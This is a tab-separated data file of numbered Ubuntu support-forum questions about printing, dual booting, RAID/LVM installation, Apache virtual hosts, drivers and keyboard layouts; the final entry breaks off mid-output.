385257	printer jam cleared but ubuntu driver still reports : /usr/lib/cups/backend/hp failed and does n't print	i know the jam has cleared because my two windows computers , a windowsxp ( wired connection to printer ) and a windows7 ( wireless connection ) , print out test pages . i tried restarting my ubuntu computer but i still get the same : /usr/lib/cups/backend/hp failed message and no printout . i suppose i could uninstall the driver and try google cloud printing but i 'd rather not . i know it works on windows computers but the ubuntu driver has worked just fine until now .
385259	change user password	hi i have a chromebook 14 . i recently installed crouton ubuntu on it . the problem is , after the installation is done it ask me to put a user name and password . i enter my user name , but whenever i am ask to enter a password nothing comes up . does anyone have problems with this ? at first i thought i did not enter a password , so i type in passwd to set it up . but whenever i do it , it tells me passwd : authentication failure .
385263	another kind of problem ... no sound on 12.04	well i think the problem is in my pc ( processor pentium 4 ( 3.12ghz ) well ... mi first soundcard ( sigmatel ) was spoiled by an electrical problem and when i try the another sound card ( envy ) this one only runs on windows i dont know why the sigmatel soundcard its in `` predeterminated '' i cant change this ... whatever thats the problem ... and i try with alsamixer and unstalling the rythmbox how i saw in other tutorials ... but nothing works ... thanks for help
385264	dump md5 and sha1 checksums with a single command !	i am looking for command or utilities for calculating md5 , sha1 hash value by one command . right now ubuntu has sha1sum and md5sum command for calculating hash value .
385266	cant install ubuntu 13.10 error : ?	i am new to ubuntu and i just got ubuntu 12.04. but my mouse does not work . after hours of trying to fix it with one of you guys we gave up . he said that the easiest way would be to switch to ubuntu 13.10 because it had the support . i put ubuntu 13.10 on a usb , and when i click the option to erase everything and install ubuntu it gives me a error message box : header : ? ? ? ? ? ? body text : ? ? ? ? ? ? i have no idea how this happens . i am running ubuntu 12.04 , but with a trackpad , and it 's a pain in the ass . i searched around , but i did n't find anything . am i missing something ?
385271	is cairo-dock full compatible after installation of amd driver with the fan club website	i have installed on my ubuntu 12.04 . lts , the version beta for the amd driver ( amd radeon hd 7650m ) with the website tool the fan club ( http : //www.thefanclub.co.za/how-to/ubuntu-amd-catalyst-install ) and i have observed that the cairo-dock is not more working . ( nothing happens in the dash when i click on it ) . so i reinstalled the release version of amd driver and for this case , i got an error when i start cairo-dock . i have seen on the website of amd catalyst http : //support.amd.com/ja-jp/kb-articles/pages/latest-linux-beta-driver.aspx that normally the problem for cairo-dock support is solved . in my case , this beta version seems to do not work for cairo . could you explain me the reason ? is it really the last beta version ? thank a lot for your help and support .
385277	how to get out of fullscreen mode ?	i was stuck in geany in fullscreen mode and unable to get out . all the suggestions i found on websites were too complicated ( for me ) . i finally discovered that by depressing the alt key and the v key , the view menu opens and i was able to uncheck fullscreen mode . problem solved . this appears to be the way one sees menus while in fullscreen mode : alt + , e.g. , file edit view etc .
385281	how to auto-run a script each time a global keyboard shortcut is used in ubuntu ?	i do n't want to reassign the global keyboard shortcut keys . they should be doing their what they were meant to do . but in addition to that , i would like a bash script to run every time the particular the shortcut ( like ctrl + c ) is used . how can get that done ?
385282	windows 8 - dell 8700 - first time ubuntu install	i have a dell 8700 with windows 8 and i 'm trying to have a dual boot option . this is my first experience with ubuntu or any linux distro . i 'm working with ubuntu 13.10 . i followed the tutorial found at this site : http : //www.everydaylinuxuser.com/2013/09/install-ubuntu-linux-alongside-windows.html . i created the partitions as indicated in this article alotting 100gb to the ubuntu install . 50gb to / , about 34 for the remainder , and 16 for a swap . upon completion of the tutorial grub loaded with the first boot and i was able to load ubuntu . i tried restarting and loading windows from the grub menu . no luck . for the life of me , i ca n't remember the error ... it was several hours ago now . i did as the tutorial suggests and use boot-repair . i went through the process and no improvement . in fact , i think i may have done something i should n't have in the process . now i simply get a `` no bootable devices found '' error when trying to boot my machine . my boot type is now uefi . i have also disabled secureboot . at this point i 'm hoping someone can point me in the right direction . i 've searched and tried several things , but given i 'm a noob , i 'm not sure if i 'm even barking up the right tree . in conclusion , my question is `` what is the best way to solve the problem of my machine not booting to either windows 8 or ubuntu after a potentially botched install ? '' i 'm thinking about trying to restore the machine with my recovery media , but will that restore the bios/uefi stuff ? if i could get back to square one i would n't hesitate to start over and try it again . i appreciate your time and help ! thank you ! edit : as requested , here is the most recent link from boot-repair : see below , second edit . while i 'm not exactly sure `` what '' i did , i 'm certain it 's a conflict between using uefi and legacy boot processes . i just ca n't seem to get the settings back to the right combination to allow me to even boot to one or the other , let alone select which os to boot . thanks again for your help ! second edit : i did a little more research and looking around this am . i now have the system booting , but get a /grub/i386-pc/normal.mod file not found and a grub rescue prompt . should i just reinstall grub into my boot designated partition ? here is my most recent boot repair : http : //paste.ubuntu.com/6514358/ thanks again for your help !
385283	unable to dual boot windows 7 and ubuntu – windows not recognized	i try to dual boot ubuntu 13.10 as well as ubuntu studio 12.04 with windows 7 on a 500gb hard drive . not only ubuntu 13.10 but also ubuntu studio 12.04 display the hard drive as having 500gb free space – like there is no partition table . but actually there are two partitions : the windows installation and empty space . so what can i do to fix this problem ?
385287	ubuntu lucid/12.04 manual installation with raid/lvm	my goal is to install ubuntu 12.04 lts using two 1t disks with mixed lvm over raid . i am running the installation using the mini iso ( bad quality cds had read error when i tried to use server iso , so figured out better to rely on the network to give me the software ) . the installation program , using the top menu entry partition disks gives quite nice and intuitive menu based approach to configure raid and lvm on top of it ( using the manual configuration option ) ; i verified that it also saved the changes to the disks and i seem to have the lvm logical volumes created like i wanted as well . however , i do not see how to tell the installation program how i want to use the created lvm groups and raid device mapper files to house my file systems . when i try to finish the `` partition disks '' phase , the installation program complains : no root file system is defined . please correct this from the partitioning menu . < continue > if i go back to the main menu , and try to continue with installing the base system , i am ( naturally enough ) told to first complete the `` partition disks '' phase . question : how can i specify my mount points so that the installation can continue ? should and could i do it manually from shell in another virtual console ? specifically is the installation program using the mount points to figure out if the partitioning is finished ? and concern is also , when is the /etc/fstab created for the new installed system ? ( i would prefer strongly to avoid creating yet another installation cd and losing my setup so far . ) fyi : my set-up /boot on a raid-1 device ( /dev/md2 ) ; / , /home , /var to be mounted on lvm logical volume in lvm volume group created to incorporate ( at the moment ) a single raid-1 device ( /dev/md1 ) , and /tmp and another partition in lvm logical volums in another lvm volume group on top of raid-0 device ( /dev/md0 ) . ( my motivation to use lvm is to give some added flexibility in arranging the space in the partitions . this is the first installation using combined lvm/raid so not sure if this is the most intelligent way of doing this . ) update i created the file systems by hand on all the devices from shell , mounted them under /target but still the ubuntu installer did not agree to proceed to installing base system . i have no idea how to convince the installer to assume the step is adequately accomplished . then i proceeded to use debootstrap to install the initial system , and continued manually tweaking the system using chroot ( repeating the steps that i had already specified during the installation steps and producing a lot of errors during installation of additional packages using apt-get and aptitude due to chroot missing functionality required for configuration of several packages ) . it was funny that somehow the `` install base system '' menu entry kind of started to work ( effortlessly fixing the configuration errors ) even if it complained about missing partitioning step . i got the rest done using the chroot environment ( configuration of grub worked after the `` install base system '' menu entry fixed the configuration problems of various packages ) . booting to my new system was successful to my great relief . it seems to me ( but have no time and interest to research ) that the mini.iso installation program was perhaps buggy . the installation guide clearly says after you set up md devices to your liking , you can finish mdcfg to return back to the partman to create filesystems on your new md devices and assign them the usual attributes like mountpoints . and ( after preparing the lvm volumes ) : after you return to the main partman screen , any created logical volumes will be displayed in the same way as ordinary partitions ( and you should treat them as such ) . this was true except that there was no way to create file system here . if i am going to ever install 12.04 on a new machine using more complicated storage configurations , and desiring to specify exactly how i want to set-up the configuration i am going to try another cd image ( alternative or server image ) or just use a live bootable system ( cd / usb ) and debootstrap without installing too many things into the half-functioning chroot before i have successfully booted into it .
385289	query the package in the ubuntu	we need use apt-get install to install the specified package by giving a package name , like sudo apt-get install linux-headers-2.6.15-26-386 . so maybe we need know if some packages exist .for example . i want to know all the packages with name started with the string linux-headers . so far . i just found two commands of advanced packaging tool can do this kind of work . dpkg -l package-name-pattern and apt-cache search string . but i found the results of these two commands are different . could someone please tell me what is the difference between them ?
385290	can i uninstall and then immediately reinstall the ubuntu printer driver	i am warned that if i uninstall the ubuntu printer driver future updates will not include new items in the ubuntu desktop system set . i do n't wish to miss out . still , several printer projects have failed even though the cause , a printer jam , has been cleared . if i can immediately reinstall the ubuntu printer driver i figure i should n't miss out . if i ca n't i guess i will . that would be a bummer .
385293	sakis 3g - use of google dns	i am using ubuntu 12.04 lts and i am using sakis 3g script to connect to my 3g wireless modem , i want to use google dns by default , i do n't know , how to use google dns in sakis3g script . in native network manager , there is a box to change these values . tell me , how to configure this in sakis 3g script . if this can be done via /etc/sakis3g.conf then what need to be entered in this file . thanks in advance .
385295	how to set the id3 year on an mp3 ?	i 'm creating my own mp3s with an online service , and i 'm setting the `` year '' attribute in the id3v tag , but i 'm having trouble getting it to work with both nautilis and rhythmbox . in nautilis , when i click on `` properties '' and select the `` audio '' tab , it shows `` year : unknown '' . in rhythmbox , it does the same when selecting the file `` properties '' and says it 's `` unknown '' . when i use easytag though , it works fine and shows the year field set properly . i 've also tried using eyed3 to try both id3 v1.x , v2.3 and v2.4 , but they all show `` unknown '' . one other observation was when i changed the year from `` unknown '' to `` 2013 '' in rhythmbox , and then closed rhythmbox , nautilis still showed `` unknown '' for the year . is there something more to setting the year field on id3 tags that i 'm missing , or is this just some subtlety between how different programs interpret the tags ?
385296	resolving xampp error 403 on ubuntu while setting virtualhost	okay , i give in . i need help before this thing drives me nuts . i run apache 2.4.4 with xampp . i have an existing site that was working correctly on www.firstdoman.com before i configured virtualhost . virtualhost site config < virtualhost *:80 > documentroot `` /opt/lampp/htdocs '' serveralias *.firstdomain.com servername www.firstdomain.com errorlog `` logs/firstdomain_error_log '' < directory `` /opt/lampp/htdocs '' > options indexes followsymlinks allowoverride all order allow , deny require all granted < /directory > < /virtualhost > < virtualhost *:80 > documentroot `` /opt/lampp/htdocs/newdomain '' servername www.newdomain.com serveralias *.newdomain.com errorlog `` logs/newdomain_error_log '' < directory `` /opt/lampp/htdocs/newdomain '' > options indexes followsymlinks allowoverride all order allow , deny require all granted < /directory > < /virtualhost > after configuration , newdomain.com works correctly without error . however , www.firstdomain.com ( which was working fine b4 ) stopped working with error 403 : error access forbidden ! new xampp security concept : access to the requested directory is only available from the local network . this setting can be configured in the file `` httpd-xampp.conf '' . error 403 error log ah01797 : client denied by server configuration : /opt/lampp/htdocs/xampp/ , referer : http : //firstdomain.com/xampp/ what beats me is that it keeps appending /xampp/ to end of firstdomain.com new xampp security concept in httpd.xampp.conf < locationmatch `` ^/ ( ? i : ( ? : xampp|security|licenses|phpmyadmin|webalizer|server-status|server-info ) ) '' > order deny , allow deny from all allow from : :1 127.0.0.0/8 require all granted # \ # fc00 : :/7 10.0.0.0/8 172.16.0.0/12 192.168.0.0/16 \ # fe80 : :/10 169.254.0.0/16 errordocument 403 /error/xampp_forbidden.html.var if i remove , `` deny from all '' , the domain reroutes to www.firstdomain.com/xampp/ and i get a xampp login ( username/password ) request . all the while , the virtualhost newdomain.com works correctly . almost going bald pulling my hair out . what could be the problem ?
385307	how to make apt-get known the imported deb package in apt-cacher	i compiled memcached with sasl enabled , and made a deb package : memcached_1.4.15-1_amd64.deb by checkinstall with package name : memcached-sasl-enabled . i imported it to apt-cacher repo by /usr/share/apt-cacher/apt-cacher-import.pl , then i ran apt-get update , apt-get install memcached-sasl-enabled , it says can not found . reading package lists ... done building dependency tree reading state information ... done e : could n't find package memcached-sasl-enabled how can i make apt-get known it ? thanks in advance !
385308	linux kernel remote debugging using gdb	i am trying to debug linux kernel using remote connection through gdb . i have followed the below steps , but there is `` connection timeout '' error @ host pc . i have a host pc ( running ubuntu 12.04 ) and have created vm ( as target pc ) on the host pc ( with ubuntu 12.04 ) . i have updated the menuconfig on vm , by enabling the kernel debugging config params and able to build and install successfully and also able to reboot the vm with new kernel ( enabled debugging ) . now i want to start the remote debugging from host pc . i am able to do ping between my host ( physical ) and target pc ( vm ) . after that i have copied the vmlinux file from target to host pc . now i am trying to run the gdb using the vmlinux on host pc ( $ gdb /path/to/vmlinux ) , and thats able to read the symbols . after that i am execting target remote targetip:1234 , but this is connecting . `` connection timed out '' error is coming . i know that i am missing some thing @ target pc . then i tried to run gdbserver @ targetpc like gdbserver host:1234 /path/to/arch/x86/boot/bzimage , but i am getting the below errors . process arch/x86/boot/bzimage created ; pid = xxxx can not exec arch/x86/boot/bzimage : exec format error . child exited with status 127 . no program to debug . gdbserver exiting . please let me know the procedure on the target pc .
385309	ubuntu 13.10 server : wget changes the filename of downloaded file automatically	i have a simple shell script on my ubuntu 13.10 server to download all files in a list . filen= '' /home/chester/test/workobject.txt '' dir_log= '' /home/chester/test '' if [ -f `` $ filen '' ] then cd $ dir_log for n in `cat $ filen` do echo $ n wget -o $ n.txt -q http : //domain.com/quicksearch ? object= $ n & search=overview done else echo `` nothing to do . '' fi the contents of workobject.txt : 9957881 9a39879 the script works properly . however , when it downloads the 9957881.txt files , it changes the filename to 9z44x7~p.txt instead . what is wrong with the script ?
385310	installing ( via wubi.exe ) 13.10 ( 32-bit ) shows an error message	the installation showed an error message at the end and it said to check the log file . i installed the os as administrator only . i have pasted the link of the whole log file here : http : //pastebin.com/jdhc9efq
385313	ca n't print over samba	i have la laptop running ubuntu 13.4 with samba4 at work . my problem is that the office printer is a shared printer on a winxp desktop runing windows lan manager 2000 . these computers are connected to a wireless network . i can install the printer ( hp m1212nf ) using cups , but when i want to print something the ugly hp notification window appears on the win machine but the printer does nothing . if i print something from the xp i have in a vm on the same laptop it works ( also get the ugly hp window ) . also i ca n't mess with the windows machine . can you help me ?
385314	more deails for internal errors	i 've been getting a lot of these internal errors with 13.10 . when i click to get more info it only says /user/bin/application-ubuntu-tried-to-run is there a way to get more details about why application-ubuntu-tried-to-run caused an error , what that error was , exit codes/return values , etc ?
385315	how to install acrobat reader 11 in ubuntu 12.04.1 using wine ( 32 bit system )	i am using ubuntu 12.04.1 ( 32 bit ) . i would like to install acrobat reader 11 ( 32 bit ) using wine . i am unable to install it in my system , since it shows the message `` set up is interrupted '' . please help .
385317	how to create symlink inner sharedirectory ?	1 ) sudo mount -t cifs // [ nas_device_ip/dir ] [ sharedirectory ] -o user=xx , pass=xx , rw , uid=xx , gid=xx 2 ) modify /etc/samba/smb.conf and then smbd restart [ global ] follow symlinks = yes wide links = yes unix extensions = no [ sharedirectory ] comment = sharedirectory browseable = yes writable = yes 3 ) cd sharedirectory 4 ) ln -s /etc/passwd passwd1 = > ln : creating symbolic link `passwd1 ' : operation not supported 5 ) also , i try to apply to client side option [ cifs.symlinks.enable=on ] , but i meet to fail again . sudo mount -t cifs // [ nas_evice_ip/dir ] [ sharedirectory ] -o user=xx , pass=xx , rw , uid=xx , cifs.symlinks.enable=on , file_mode=0777 , dir_mode=0777 , gid=xx [ test environment ) os version : ubuntu 10.04.4 lts kernel version : 2.6.35-25 mount.cifs version : 1.12-3.4.7 samba version : version 3.4.7 can you give me any help and advice , please ?
385318	keyboard configuration	i recently upgraded to unbuntu 13.10 , and i have trouble configuring my keyboard . this is driving me crazy ... i have an apple aluminium keyboard , swiss french layout . i do n't understand how things are handled . i played with : language support - > input method system : default / ibus / noe input methods text entry settings setxkbmap my troubles : brackets [ and { : closing elements are not next to the enter key backslash can not be done by alt + < keypad dot prints a comma before , making it worse ... . if someone can give a hand on this , it would be awesome ! thanks , denis
385319	lot of things gone wrong .	my computer came pre-installed with windows 8 , i tried to install ubuntu , but ubuntu shows a black screen and a little sound after a purple screen ( literally ca n't do anything ) and my option to boot into windows has disappeared . i think somewhere in the process it go de-installed . i literally ca n't do anything and even the usb live key goes to a black screen . yes , i have tried legacy mode , ( i have a uefi ) but even that does not work . is there any way to get to ubuntu and recover my windows files ( pretty sure i lost those ) . i 'm new at this so i do n't really understand what 's happening . but if i have to reinstall windows thats fine , i was planning to do that in a week or so .
385320	multiple kernels choices realtime or no realtime	i have a dell latitude d510 currently running xubuntu 13.04 and linux 3.8 . i want this machine to host jack processes together with edirol ua-25 during a live session and therefore , it needs an rt kernel . since this is a laptop , i do like to have no rt kernel installed also saving power . how can i configure this ?
385324	a working checkers/draughts ?	i am trying to find an implementation of checkers/draughts that works . i did `` sudo apt-get install kcheckers '' and when i run it i get a window that i ca n't expand ( so it works but just in a small window ) . on the terminal i see your locale : `` en_gb '' prefix path : /usr loading qt translations failed . loading kcheckers translations failed .
385325	ubuntu 13.10 , brightness settings issue	i have n't experienced any issues when 13.10 is installed on my desktop but after installing it on my laptop ( fujitsu lifebook ) the brightness settings seem to default to the dimmest setting and even though i manually slide it to the brightest it will always default each time i reboot . is there a fix for this ?
385328	package failed to install	when execute this command sudo aptitude install automake1.9 autoconf the result is this error setting up python-setuptools ( 0.6c8-4 ) ... /var/lib/dpkg/info/python-setuptools.postinst : /usr/bin/pycentral : /usr/bin/python : bad interpreter : permission denied dpkg : error processing python-setuptools ( -- configure ) : subprocess post-installation script returned error exit status 126 errors were encountered while processing : python-setuptools e : sub-process /usr/bin/dpkg returned an error code ( 1 ) a package failed to install . trying to recover :
385333	how do i get the filename from inotifywait events ?	so i 'm doing a simple inotifywait loop to watch for changes in a bootstrap directory : while inotifywait -r -q -- format % w bootstrap/ ; do echo `` something happened '' [ [ $ filename == *.js ] ] & & uglifyjs ... .. [ [ $ filename == *.less ] ] & & lessc bootstrap.less done you do n't really need to worry about the internals but i just ca n't get the filename back into a bash scope . inotifywait echos out the filename ( with help from the format argument ) but how do i capture that and use it later on ( in my case , as $ filename ) ? if you want a simple , short test harness : touch testfile while inotifywait testfile do ; echo `` ... '' ; done and then you can just run touch testfile when you want to trigger it .
385334	failed to download repository information , check your internet connection	though i have connected to internet , when tried to update manager , it is showing this message . due to this , there is an error displaying on desktop at top right corner .. can any one help me to resolve this prblem .
385335	different language layouts one output on ubuntu 13.10	i have a very weird problem . no matter what my keyboard layout is it always outputs english letters . if the layout is french ( fr ) , bulgarian ( bg ) it still outputs english letters ... any ideas ?
385336	how to solve poor battery backup issue on ubuntu 13.10 ?	i have ubuntu 13.10 installed on lenovo z585 thinkpad with amd processor.when the ac power is unplugged , my laptop battery drains so fast . i have windows8 along with ubuntu ( dual boot ) and in windows the same battery lasts long . pls suggest some solution . ps : i have no background in coding therefore i could n't understand the earlier posts related to this issue . i have tried installing ubuntu for the first time just by following this website and the detailed instructions . i would appreciate if you can give me solution in layman or in step by step manner . thanks . hoping to get replies .
385343	problem with installing mobile partner errors	this is the error i get now.although i had previously installed it and it worked fine . install : line 310 : [ : -ne : unary operator expected install : line 317 : [ : -ne : unary operator expected install : line 324 : [ : -gt : unary operator expected install : line 329 : [ : -lt : unary operator expected install : line 337 : [ : -gt : unary operator expected install : line 342 : [ : -lt : unary operator expected install : line 350 : [ : -gt : unary operator expected install : line 355 : [ : -lt : unary operator expected the software is exist . do you want overwrite it ? ( [ y ] /n ) : y mkdir : missing operand try 'mkdir -- help ' for more information . can not create dir : finished , press any key to exit here is the source for install script : http : //shrib.com/mp21
385344	how to switch from lubuntu to xubuntu	i 've just installed xubuntu-desktop on my trusty lenovo x61 on top of lubuntu 13.10 . however , when the machine boots up it always logs straight into a lubuntu session without asking . to resolve this i tried uninstalling lubuntu with sudo apt-get remove lubuntu-desktop but this turned out to be a bad idea as it booted to a black screen . in tty1 i re-installed lubuntu and now i 'm back to square 1 . but i want xubuntu ! i 've heard taskel can be used to manage startup but wondered what the community would recommend . many thanks . robin
385345	installing ubuntu 12.10 on a vista laptop	i have been getting the same error message when installing ubuntu 12.10 : an error occurred : could not retrieve the required disk image files . for more information , please see the log file : even if i try run it from my hard drive or dvd , the same thing happens .
385346	how to add an option to create a new file with a specific extension in right click menu	the title says all . i would like to have this option in right click menu on the desktop or in nautilus . i know that is possible , but i do n't remember how to do this .
385350	how to use a ps3 daulshock controller on ubuntu 12.04 via usb	i want to know how to use a ps3 daulshock controller on ubuntu 12.04 via usb , everywhere i search i see people posting tuts on pairing it via bluetooth and disregards the usb connection , except for the initial pairing . well , ubuntu wo n't detect my bluetooth adapter and i 'm too lazy to keep trying to fix it . so can someone please tell me how to use my ps3 controller on ubuntu 12.04 only using usb ? i want to use it to play minecraft . do n't get me wrong , i enjoy the keyboard , but sometimes a gamepad is a little more fun . : p
385351	ubuntu 12.04 loses ethernet driver after update and reboot	i have a i210 gigabit network connection and it requires me to install the driver manually , the driver is igb-5.0.6 . so this is what i do : sudo make install sudo modprobe igb then everything works fine . my ubuntu 12.04 automatic updates is enables and whenever it runs it requires me to reboot and after that my eth* is gone . how do i stop the updates to make my network driver go missing or any other solutions ? modinfo igb filename : /lib/modules/3.2.0-57-generic/kernel/drivers/net/igb/igb.ko version : 5.0.6 license : gpl description : intel ( r ) gigabit ethernet network driver author : intel corporation , < e1000-devel @ lists.sourceforge.net > srcversion : 7d5c0c9d2d9df9f98067fa5 alias : pci : v00008086d000010d6sv*sd*bc*sc*i* alias : pci : v00008086d000010a9sv*sd*bc*sc*i* alias : pci : v00008086d000010a7sv*sd*bc*sc*i* alias : pci : v00008086d000010e8sv*sd*bc*sc*i* alias : pci : v00008086d00001526sv*sd*bc*sc*i* alias : pci : v00008086d0000150dsv*sd*bc*sc*i* alias : pci : v00008086d000010e7sv*sd*bc*sc*i* alias : pci : v00008086d000010e6sv*sd*bc*sc*i* alias : pci : v00008086d00001518sv*sd*bc*sc*i* alias : pci : v00008086d0000150asv*sd*bc*sc*i* alias : pci : v00008086d000010c9sv*sd*bc*sc*i* alias : pci : v00008086d00000440sv*sd*bc*sc*i* alias : pci : v00008086d0000043csv*sd*bc*sc*i* alias : pci : v00008086d0000043asv*sd*bc*sc*i* alias : pci : v00008086d00000438sv*sd*bc*sc*i* alias : pci : v00008086d00001516sv*sd*bc*sc*i* alias : pci : v00008086d00001511sv*sd*bc*sc*i* alias : pci : v00008086d00001510sv*sd*bc*sc*i* alias : pci : v00008086d00001527sv*sd*bc*sc*i* alias : pci : v00008086d0000150fsv*sd*bc*sc*i* alias : pci : v00008086d0000150esv*sd*bc*sc*i* alias : pci : v00008086d00001524sv*sd*bc*sc*i* alias : pci : v00008086d00001523sv*sd*bc*sc*i* alias : pci : v00008086d00001522sv*sd*bc*sc*i* alias : pci : v00008086d00001521sv*sd*bc*sc*i* alias : pci : v00008086d00001539sv*sd*bc*sc*i* alias : pci : v00008086d0000157csv*sd*bc*sc*i* alias : pci : v00008086d0000157bsv*sd*bc*sc*i* alias : pci : v00008086d00001538sv*sd*bc*sc*i* alias : pci : v00008086d00001537sv*sd*bc*sc*i* alias : pci : v00008086d00001536sv*sd*bc*sc*i* alias : pci : v00008086d00001533sv*sd*bc*sc*i* alias : pci : v00008086d00001f45sv*sd*bc*sc*i* alias : pci : v00008086d00001f41sv*sd*bc*sc*i* alias : pci : v00008086d00001f40sv*sd*bc*sc*i* depends : dca vermagic : 3.2.0-57-generic smp mod_unload modversions parm : interruptthrottlerate : maximum interrupts per second , per vector , ( max 100000 ) , default 3=adaptive ( array of int ) parm : intmode : change interrupt mode ( 0=legacy , 1=msi , 2=msi-x ) , default 2 ( array of int ) parm : node : set the starting node to allocate memory on , default -1 ( array of int ) parm : lliport : low latency interrupt tcp port ( 0-65535 ) , default 0=off ( array of int ) parm : llipush : low latency interrupt on tcp push flag ( 0,1 ) , default 0=off ( array of int ) parm : llisize : low latency interrupt on packet size ( 0-1500 ) , default 0=off ( array of int ) parm : rss : number of receive-side scaling descriptor queues ( 0-8 ) , default 1 , 0=number of cpus ( array of int ) parm : vmdq : number of virtual machine device queues : 0-1 = disable , 2-8 enable , default 0 ( array of int ) parm : max_vfs : number of virtual functions : 0 = disable , 1-7 enable , default 0 ( array of int ) parm : mdd : malicious driver detection ( 0/1 ) , default 1 = enabled . only available when max_vfs is greater than 0 ( array of int ) parm : queuepairs : enable tx/rx queue pairs for interrupt handling ( 0,1 ) , default 1=on ( array of int ) parm : eee : enable/disable on parts that support the feature ( array of int ) parm : dmac : disable or set latency for dma coalescing ( ( 0=off , 1000-10000 ( msec ) , 250 , 500 ( usec ) ) ( array of int ) parm : lro : large receive offload ( 0,1 ) , default 0=off ( array of int ) parm : debug : debug level ( 0=none , ... , 16=all ) ( int )
385353	rsyslog custom severity names	i am using rsyslog to log messages from multiple remote machines onto a central hub . the setup is working as intended and all is well , however , i would like to normalize the output . the different severity levels have different lengths , and so the logs are sometimes not aligned correctly , i would like to know if there is a way for me to define custom display names to the different severity levels . since they are essentially a mapping between a number and a word , i do n't think it should be a big problem . here is what i want it to be : # severity keyword | replace ( final display ) -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- | -- -- -- -- -- -- -- -- -- -- -- -- 0 emergency emerg ( panic ) | emrg 1 alert alert | alrt 2 critical crit | crit 3 error err ( error ) | eror 4 warning warning ( warn ) | warn 5 notice notice | note 6 informational info | info 7 debug debug | dbug i have no been able to find anywhere to do this , and i would like some assistance . note : i am running the ubuntu 12.04.1 native version of rsyslog ( version 5.8.6 )
385354	cant open my external backup hard drive	my external back up hard drive is a wd 1t which was being used for the macbook pro for automatick backup . now i am using a mini hp and my external hard drive is not opening . would i open it with the ubuntu desk top ?
385359	installing 64 bit kernel on 32bit ubuntu	i compiled my own custom kernel in a 64 bit linux mint 16 installation . i 've also heard that the 64 bit kernel could also run 32 bit applications too . would it be possible to install it and use it in the 32-bit ubuntu 13.10 installation or do i have to recompile it again for the 32-bit ? if 32 bit ubuntu would run on this kernel , is there any problems i am going to encounter while using this kernel ?
385360	dual boot : windows 8 and ubuntu	i am not able to see the ubuntu os during the pc boot , and it boots directly into windows 8 . please see my boot-repair info .
385364	is this correct ubuntu for me ?	i have intel i7 4770 processor with 4gb ram . i am downloading ubuntu from this link . http : //www.ubuntu.com/download/desktop/questions ? distro=desktop & bits=32 & release=lts it is ubuntu 12.04.3-desktop-i386.iso -- > 707mb is it a live cd or can i install permanently to my pc ? i want to install permanently only . so am i downloading the correct ubuntu ? ... because its just 707mb .
385366	how we can do bandwidth limitation in squid proxy	i have ubuntu 12.4 server installed with squid3 . my squid proxy is working fine , but customer want to restrict users to 1 gb download and upload .
385368	disable changing keyboard layout with shft_l+shift_r	i 'm using gnome shell with ubuntu 13.10 . i always used layout switching with alt+shift . after upgrade to 13.10 , the layout can also be switched by pressing both shifts simultaneously . how do i prevent that ? i tried e.g . gsettings list-recursively | grep -i shift which did n't reveal any shift_l+shift_r or grp : shifts_toggle value . after reading through change keyboard layout with both left and right alt + shift combos i also tried : setxkbmap us , cs , de -option `` '' setxkbmap us , cs , de -option `` grp : alt_shift_toggle '' after the first setxkbmap , i could n't switch layout with either shortcut . after the second setxkbmap , both shortcuts worked again : -/ is this a bug ? by the way , i also disabled the now default < super > +space because it anyway did n't work properly either .
385370	how to modify the directory date ?	in windows , i am used to modify directory dates , eg . of directories containing photos according the date when the first photo was taken ; and then display a list of the directories sorted by the dates . in ubuntu , krusader can display the directories this way . i need to change the date ( the `` date of modifying '' ) of a directory after i fill it with eg . the photos . how should i change it ? thanks
385371	dual-boot win/ubuntu - 13.10 works , 13.04 works not !	so my problem is that i need to install 13.04 and not 13.10 . that would n't be a problem if the 13.04 version of ubuntu would just boot the live usb so that i could install it onto the harddrive . unforunately 13.04 gives me just a black screen and freezes when booting the live usb but 13.10 boots just fine and i 've also tried installing 13.10 and it works fine . i 've read all the threads here regarding dual-booting ubuntu with windows 8 on a pre-installed windows uefi system and went through all that when i installed the 13.10 version of ubuntu on my machine so that is not an issue any longer with me . it just does n't work booting the 13.04 live usb . what could be wrong ? update : i tried running the installer of ubuntu 13.04 with no splash and nomodeset by pressing 'e ' when `` try ubuntu '' was selected in the boot menu . the result was that i got an infinite loop presenting me with these three lines : usb 2-6 : unable to read config index 0 descriptor/start : -71 usb 2-6 : ca n't read configurations , error -71 hub 2-0:1.0 : unable to enumerate usb device on port 6 thank you .
385372	vfs 495 finger print reader not working in ubuntu	i have hp probook 450 and it has integrated finger print reader vfs 495 from validity inc . i have linux drivers from the hp site . now i want to make it work it in ubuntu . the drivers are in rpm format so i used alien converter to convert it into deb package and then installed . link to hp driver page : driver fyi : this driver package has some fprint wrapper library contained and also has a file hpusbvfs495.img , but i was unable to figure out , how it works . output of lspci & & lsusb : 00:00.0 host bridge : intel corporation 3rd gen core processor dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation 7 series/c210 series chipset family usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation 7 series/c210 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 1 ( rev c4 ) 00:1c.2 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 3 ( rev c4 ) 00:1c.3 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 4 ( rev c4 ) 00:1c.5 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 6 ( rev c4 ) 00:1d.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation hm76 express chipset lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation 7 series chipset family 6-port sata controller [ ahci mode ] ( rev 04 ) 02:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. rts5229 pci express card reader ( rev 01 ) 03:00.0 network controller : ralink corp. rt3290 wireless 802.11n 1t/1r pcie 03:00.1 bluetooth : ralink corp. rt3290 bluetooth 04:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller ( rev 0c ) bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 004 : id 04ca:7022 lite-on technology corp . bus 001 device 003 : id 138a:003f validity sensors , inc . bus 001 